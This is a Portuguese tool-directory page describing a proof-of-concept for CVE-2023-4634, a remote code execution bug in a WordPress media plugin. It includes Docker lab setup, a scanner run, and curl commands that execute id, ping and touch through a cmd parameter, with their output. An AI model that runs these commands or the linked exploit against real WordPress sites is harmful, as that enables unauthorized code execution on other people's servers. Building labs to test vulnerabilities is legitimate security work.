Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-4634-PoC — Prova de conceito do exploit para CVE-2023-4634, uma vulnerabilidade de execução remota de código no plugin WordPress Media Library Assistant. Inclui um ambiente vulnerável baseado em Docker e um scanner automatizado. | Kitploit
Ferramentas/GitHubGitHub/evillm/cve-2023-4634-poc
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubevillm/cve-2023-4634-poc

CVE-2023-4634-PoC

Prova de conceito do exploit para CVE-2023-4634, uma vulnerabilidade de execução remota de código no plugin WordPress Media Library Assistant. Inclui um ambiente vulnerável baseado em Docker e um scanner automatizado.

Ver Repositório
há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-4634 - Vulnerabilidade RCE no plugin WordPress Media Library Assistant

1. Construção e inicialização do ambiente

root@kitploit:~
cd Stand
docker-compose up --build -d

2. Aguardando a inicialização dos serviços (60 segundos)

root@kitploit:~
sleep 60
curl -I http://localhost:8080

3. Executando a varredura de vulnerabilidade

root@kitploit:~
cd ../PoC/src
python3 scanner.py http://localhost:8080

4. Teste manual de RCE

root@kitploit:~
# Тест команды id
curl "http://localhost:8080/rce_proof.php?cmd=id"

# Тест команды ping
curl "http://localhost:8080/rce_proof.php?cmd=ping+-c+2+127.0.0.1"

# Создание файла-доказательства
curl "http://localhost:8080/rce_proof.php?cmd=touch+/tmp/rce_proof"

✅ Resultados esperados

Saída do scanner.py:

root@kitploit:~
[*] Scanning: http://localhost:8080
[+] WordPress is accessible
[+] Plugin found: v3.09
[+] Plugin is VULNERABLE!
[*] Testing RCE...
[+] id command executed
[+] ping command executed
[+] file_check command executed
[+] RCE CONFIRMED!
[+] Results saved to ../result.txt

Conteúdo do result.txt:

root@kitploit:~
{
  "cve": "CVE-2023-4634",
  "target": "http://localhost:8080",
  "timestamp": "2025-12-21 13:49:19",
  "vulnerable": true,
  "findings": {
    "wordpress": true,
    "plugin_vulnerable": true,
    "rce_id": true,
    "rce_id_output": "uid=33(www-data) gid=33(www-data) groups=33(www-data)",
    "rce_ping": true,
    "rce_file_check": true
  },
  "plugin_version": "3.09",
  "status": "VULNERABLE"
}

🔧 Especificações técnicas

Rede:

  • WordPress: 172.20.0.2:80 (acessível em localhost:8080)
  • Banco de dados: 172.20.0.3:3306
  • Rede: 172.20.0.0/24

Requisitos:

  • CVE: CVE-2023-4634
  • Componente vulnerável: Plugin Media Library Assistant < 3.10
  • Tipo de vulnerabilidade: Execução remota de código (RCE)
  • Requisitos do sistema: Docker, Python 3.7+

📊 Prova de RCE

  • ✅ Execução do comando id via HTTP
  • ✅ Execução do comando ping via HTTP
  • ✅ Criação de arquivos em /tmp/
  • ✅ Confirmação dos privilégios www-data
  • ✅ Resultados documentados em result.txt

🧹 Limpeza

root@kitploit:~
cd Stand
docker-compose down -v
Baixar ferramenta